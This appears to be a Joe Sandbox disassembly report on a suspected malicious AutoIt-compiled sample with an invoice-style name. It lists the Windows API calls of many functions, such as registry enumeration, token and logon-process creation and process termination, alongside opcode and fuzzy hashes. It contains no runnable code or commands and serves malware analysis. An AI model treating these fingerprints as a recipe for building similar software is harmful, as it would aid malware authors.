                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: _memmove$__itow__swprintf
                                          • String ID:
                                          • API String ID: 3253778849-0
                                          • Opcode ID: 646b6e6f701bcb80f333d511d08e610e681205344f5486b80d29ddc92782b955
                                          • Instruction ID: 21da70feb02ff46742cf7b1a596b1e1f747712b30ca55ffc0ed3d6fa2aea8e56
                                          • Opcode Fuzzy Hash: 646b6e6f701bcb80f333d511d08e610e681205344f5486b80d29ddc92782b955
                                          • Instruction Fuzzy Hash: 6261707160025A9BCF01EF61DC81AFE37A5AF05308F45452EF8556B293EB38AD05CB5A
                                          APIs
                                            • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                            • Part of subcall function 00480E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31
                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004802BD
                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004802FD
                                          • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00480320
                                          • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00480349
                                          • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0048038C
                                          • RegCloseKey.ADVAPI32(00000000), ref: 00480399
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                          • String ID:
                                          • API String ID: 4046560759-0
                                          • Opcode ID: 7cc6289c2aa7324cbd4a80f658f4942adf24dac0538f3eacdd59aa7931d7e71f
                                          • Instruction ID: d871ff08e979a7a46cd08627f86c845b9cb8169993b1d7d4ad27b4e2648fe78e
                                          • Opcode Fuzzy Hash: 7cc6289c2aa7324cbd4a80f658f4942adf24dac0538f3eacdd59aa7931d7e71f
                                          • Instruction Fuzzy Hash: 68515C71118204AFC710EF65C885E6FBBE8FF85318F04492EF945972A2DB35E909CB56
                                          APIs
                                          • GetMenu.USER32(?), ref: 004857FB
                                          • GetMenuItemCount.USER32(00000000), ref: 00485832
                                          • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0048585A
                                          • GetMenuItemID.USER32(?,?), ref: 004858C9
                                          • GetSubMenu.USER32(?,?), ref: 004858D7
                                          • PostMessageW.USER32(?,00000111,?,00000000), ref: 00485928
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Menu$Item$CountMessagePostString
                                          • String ID:
                                          • API String ID: 650687236-0
                                          • Opcode ID: fad01ffac506ac452b0c02e795c4ae8801d71ba59cba857f2c5d01f3afad97ac
                                          • Instruction ID: f019c79df8c938943ad8434395c060b2cb7e18679ec399e957168710705cd923
                                          • Opcode Fuzzy Hash: fad01ffac506ac452b0c02e795c4ae8801d71ba59cba857f2c5d01f3afad97ac
                                          • Instruction Fuzzy Hash: 72514C75E00615AFCF11EF65C845AAEBBB4EF48314F10446AE801BB352DB78AE418B99
                                          APIs
                                          • VariantInit.OLEAUT32(?), ref: 0045EF06
                                          • VariantClear.OLEAUT32(00000013), ref: 0045EF78
                                          • VariantClear.OLEAUT32(00000000), ref: 0045EFD3
                                          • _memmove.LIBCMT ref: 0045EFFD
                                          • VariantClear.OLEAUT32(?), ref: 0045F04A
                                          • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0045F078
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Variant$Clear$ChangeInitType_memmove
                                          • String ID:
                                          • API String ID: 1101466143-0
                                          • Opcode ID: 3a696c756d5f9f21b3064a47137a411a2eda9f735d8382ec367d4cfec0c8664e
                                          • Instruction ID: 3df6c570488be2a998a5abfaea7cf2d50daf9fdb1352742cca5bf42246c3e2d0
                                          • Opcode Fuzzy Hash: 3a696c756d5f9f21b3064a47137a411a2eda9f735d8382ec367d4cfec0c8664e
                                          • Instruction Fuzzy Hash: 04517D75A00209EFCB14CF58C884AAAB7B8FF4C314B15856AED49DB342E334E915CF94
                                          APIs
                                          • _memset.LIBCMT ref: 00462258
                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004622A3
                                          • IsMenu.USER32(00000000), ref: 004622C3
                                          • CreatePopupMenu.USER32 ref: 004622F7
                                          • GetMenuItemCount.USER32(000000FF), ref: 00462355
                                          • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00462386
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                          • String ID:
                                          • API String ID: 3311875123-0
                                          APIs
                                            • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                          • BeginPaint.USER32(?,?,?,?,?,?), ref: 0040179A
                                          • GetWindowRect.USER32(?,?), ref: 004017FE
                                          • ScreenToClient.USER32(?,?), ref: 0040181B
                                          • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0040182C
                                          • EndPaint.USER32(?,?), ref: 00401876
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                          • String ID:
                                          • API String ID: 1827037458-0
                                          APIs
                                          • ShowWindow.USER32(004C57B0,00000000,00C711A8,?,?,004C57B0,?,0048B5A8,?,?), ref: 0048B712
                                          • EnableWindow.USER32(00000000,00000000), ref: 0048B736
                                          • ShowWindow.USER32(004C57B0,00000000,00C711A8,?,?,004C57B0,?,0048B5A8,?,?), ref: 0048B796
                                          • ShowWindow.USER32(00000000,00000004,?,0048B5A8,?,?), ref: 0048B7A8
                                          • EnableWindow.USER32(00000000,00000001), ref: 0048B7CC
                                          • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0048B7EF
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Window$Show$Enable$MessageSend
                                          • String ID:
                                          • API String ID: 642888154-0
                                          APIs
                                          • GetForegroundWindow.USER32(?,?,?,?,?,?,00474E41,?,?,00000000,00000001), ref: 004770AC
                                            • Part of subcall function 004739A0: GetWindowRect.USER32(?,?), ref: 004739B3
                                          • GetDesktopWindow.USER32 ref: 004770D6
                                          • GetWindowRect.USER32(00000000), ref: 004770DD
                                          • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 0047710F
                                            • Part of subcall function 00465244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004652BC
                                          • GetCursorPos.USER32(?), ref: 0047713B
                                          • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00477199
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                          • String ID:
                                          • API String ID: 4137160315-0
                                          APIs
                                            • Part of subcall function 004580A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004580C0
                                            • Part of subcall function 004580A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004580CA
                                            • Part of subcall function 004580A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004580D9
                                            • Part of subcall function 004580A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 004580E0
                                            • Part of subcall function 004580A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004580F6
                                          • GetLengthSid.ADVAPI32(?,00000000,0045842F), ref: 004588CA
                                          • GetProcessHeap.KERNEL32(00000008,00000000), ref: 004588D6
                                          • HeapAlloc.KERNEL32(00000000), ref: 004588DD
                                          • CopySid.ADVAPI32(00000000,00000000,?), ref: 004588F6
                                          • GetProcessHeap.KERNEL32(00000000,00000000,0045842F), ref: 0045890A
                                          • HeapFree.KERNEL32(00000000), ref: 00458911
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                          • String ID:
                                          • API String ID: 3008561057-0
                                          APIs
                                          • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 004585E2
                                          • OpenProcessToken.ADVAPI32(00000000), ref: 004585E9
                                          • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 004585F8
                                          • CloseHandle.KERNEL32(00000004), ref: 00458603
                                          • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00458632
                                          • DestroyEnvironmentBlock.USERENV(00000000), ref: 00458646
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                          • String ID:
                                          • API String ID: 1413079979-0
                                          APIs
                                          • GetDC.USER32(00000000), ref: 0045B7B5
                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 0045B7C6
                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0045B7CD
                                          • ReleaseDC.USER32(00000000,00000000), ref: 0045B7D5
                                          • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0045B7EC
                                          • MulDiv.KERNEL32(000009EC,?,?), ref: 0045B7FE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: CapsDevice$Release
                                          • String ID:
                                          • API String ID: 1035833867-0
                                          APIs
                                          • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00420193
                                          • MapVirtualKeyW.USER32(00000010,00000000), ref: 0042019B
                                          • MapVirtualKeyW.USER32(000000A0,00000000), ref: 004201A6
                                          • MapVirtualKeyW.USER32(000000A1,00000000), ref: 004201B1
                                          • MapVirtualKeyW.USER32(00000011,00000000), ref: 004201B9
                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 004201C1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Virtual
                                          • String ID:
                                          • API String ID: 4278518827-0
                                          APIs
                                          • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 004653F9
                                          • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0046540F
                                          • GetWindowThreadProcessId.USER32(?,?), ref: 0046541E
                                          • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0046542D
                                          • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00465437
                                          • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0046543E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                          • String ID:
                                          • API String ID: 839392675-0
                                          APIs
                                          • InterlockedExchange.KERNEL32(?,?), ref: 00467243
                                          • EnterCriticalSection.KERNEL32(?,?,00410EE4,?,?), ref: 00467254
                                          • TerminateThread.KERNEL32(00000000,000001F6,?,00410EE4,?,?), ref: 00467261
                                          • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00410EE4,?,?), ref: 0046726E
                                            • Part of subcall function 00466C35: CloseHandle.KERNEL32(00000000,?,0046727B,?,00410EE4,?,?), ref: 00466C3F
                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 00467281
                                          • LeaveCriticalSection.KERNEL32(?,?,00410EE4,?,?), ref: 00467288
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                          • String ID:
                                          • API String ID: 3495660284-0
                                          APIs
                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0045899D
                                          • UnloadUserProfile.USERENV(?,?), ref: 004589A9
                                          • CloseHandle.KERNEL32(?), ref: 004589B2
                                          • CloseHandle.KERNEL32(?), ref: 004589BA
                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 004589C3
                                          • HeapFree.KERNEL32(00000000), ref: 004589CA
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                          • String ID:
                                          • API String ID: 146765662-0
                                          • Opcode ID: fc20ddc87a5fd273a18fa8ef1565cbc608650ceaa5a7efc3272966d010428556
                                          • Instruction ID: 8deadb4208ce055a946e280c670b0e99f3db2db319c6731f307d9ea981cf4585
                                          • Opcode Fuzzy Hash: fc20ddc87a5fd273a18fa8ef1565cbc608650ceaa5a7efc3272966d010428556
                                          • Instruction Fuzzy Hash: 94E0C236004401FBDA011FE1EC0C90ABB69FB89322B108A38F219C1074CB32A828DB58
                                          APIs
                                          • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00492C7C,?), ref: 004576EA
                                          • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00492C7C,?), ref: 00457702
                                          • CLSIDFromProgID.OLE32(?,?,00000000,0048FB80,000000FF,?,00000000,00000800,00000000,?,00492C7C,?), ref: 00457727
                                          • _memcmp.LIBCMT ref: 00457748
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: FromProg$FreeTask_memcmp
                                          • String ID: ,,I
                                          • API String ID: 314563124-4163367948
                                          • Opcode ID: 947aafcc5355d7d4454fef49f7e6cd79d9861281e848203aa0a317f96205b2d7
                                          • Instruction ID: be765e1d57b8148d1cf66b3d68047348fb9be163096bbb02cdfcec4a4c199039
                                          • Opcode Fuzzy Hash: 947aafcc5355d7d4454fef49f7e6cd79d9861281e848203aa0a317f96205b2d7
                                          • Instruction Fuzzy Hash: 08815D71A00109EFCB00DFA4D984EEEB7B9FF89315F204469F505AB251DB75AE0ACB64
                                          APIs
                                          • VariantInit.OLEAUT32(?), ref: 00478613
                                          • CharUpperBuffW.USER32(?,?), ref: 00478722
                                          • VariantClear.OLEAUT32(?), ref: 0047889A
                                            • Part of subcall function 00467562: VariantInit.OLEAUT32(00000000), ref: 004675A2
                                            • Part of subcall function 00467562: VariantCopy.OLEAUT32(00000000,?), ref: 004675AB
                                            • Part of subcall function 00467562: VariantClear.OLEAUT32(00000000), ref: 004675B7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Variant$ClearInit$BuffCharCopyUpper
                                          • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                          • API String ID: 4237274167-1221869570
                                          • Opcode ID: 332034fd6ca578468b57f7b7a1e811b17ad40028d9d2093941ac43483d342d7e
                                          • Instruction ID: 60eff2204552638baa50968c5b1ec12482493ff8819337d84e8636a8f0030324
                                          • Opcode Fuzzy Hash: 332034fd6ca578468b57f7b7a1e811b17ad40028d9d2093941ac43483d342d7e
                                          • Instruction Fuzzy Hash: E1916D756043019FC710EF25C48499BB7E4EF89718F14896EF88A9B3A2DB34ED06CB56
                                          APIs
                                            • Part of subcall function 0041FC86: _wcscpy.LIBCMT ref: 0041FCA9
                                          • _memset.LIBCMT ref: 00462B87
                                          • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00462BB6
                                          • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00462C69
                                          • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00462C97
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: ItemMenu$Info$Default_memset_wcscpy
                                          • String ID: 0
                                          • API String ID: 4152858687-4108050209
                                          • Opcode ID: b89093a998e3cf012ea480837d41f08897d95beaf01e83ce83b987816d7c9aa6
                                          • Instruction ID: 8d65d54c91bb2834d650baaa5c58db0a2d3f708132dab7008ae6ceb83fe6ffca
                                          • Opcode Fuzzy Hash: b89093a998e3cf012ea480837d41f08897d95beaf01e83ce83b987816d7c9aa6
                                          • Instruction Fuzzy Hash: BF51DD71208B01AED7249E28DA44A6F77E8EF44314F040A2FF880D7291EBB8DC44875B
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: _memmove$_free
                                          • String ID: 3cA$_A
                                          • API String ID: 2620147621-3480954128
                                          • Opcode ID: ef0129cd5816ec15a45b032bd3f3c56bb013280cf55210c9ba5302c07174546d
                                          • Instruction ID: 850dd104c1974142ce8a52b298ec70faaced32133f8a19a743ede36878807482
                                          • Opcode Fuzzy Hash: ef0129cd5816ec15a45b032bd3f3c56bb013280cf55210c9ba5302c07174546d
                                          • Instruction Fuzzy Hash: C7518C716043418FDB24CF29C840BABBBE1FF85304F49482EE98987351DB39E941CB4A
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: _memset$_memmove
                                          • String ID: 3cA$ERCP
                                          • API String ID: 2532777613-1471582817
                                          • Opcode ID: f26897e622874a94d3a5be45ebb38ce857f1f7ed6e3ab2c2ed74d649e7167b68
                                          • Instruction ID: eaf8e981165fb7e982de03985e75bf568e49202a02b644e32a28802e4b47c64a
                                          • Opcode Fuzzy Hash: f26897e622874a94d3a5be45ebb38ce857f1f7ed6e3ab2c2ed74d649e7167b68
                                          • Instruction Fuzzy Hash: 02518C71A00709DBDB24DF65C9817EBB7F4AF04304F2085AFE94A86241E778EA858B59
                                          APIs
                                          • _memset.LIBCMT ref: 004627C0
                                          • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 004627DC
                                          • DeleteMenu.USER32(?,00000007,00000000), ref: 00462822
                                          • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,004C5890,00000000), ref: 0046286B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Menu$Delete$InfoItem_memset
                                          • String ID: 0
                                          • API String ID: 1173514356-4108050209
                                          • Opcode ID: 0b59e6d123104e8f486f51701735be17c722a032adafe4466648fbe3018c70b5
                                          • Instruction ID: 6162d5963bf1ca612739d8e457cf9df7481532cfa70a9704744149088ee17d1e
                                          • Opcode Fuzzy Hash: 0b59e6d123104e8f486f51701735be17c722a032adafe4466648fbe3018c70b5
                                          • Instruction Fuzzy Hash: F141AE70604701AFD720EF29CD44B1BBBE4AF84314F044A2EF96597391E7B8A905CB6B
                                          APIs
                                          • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0047D7C5
                                            • Part of subcall function 0040784B: _memmove.LIBCMT ref: 00407899
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
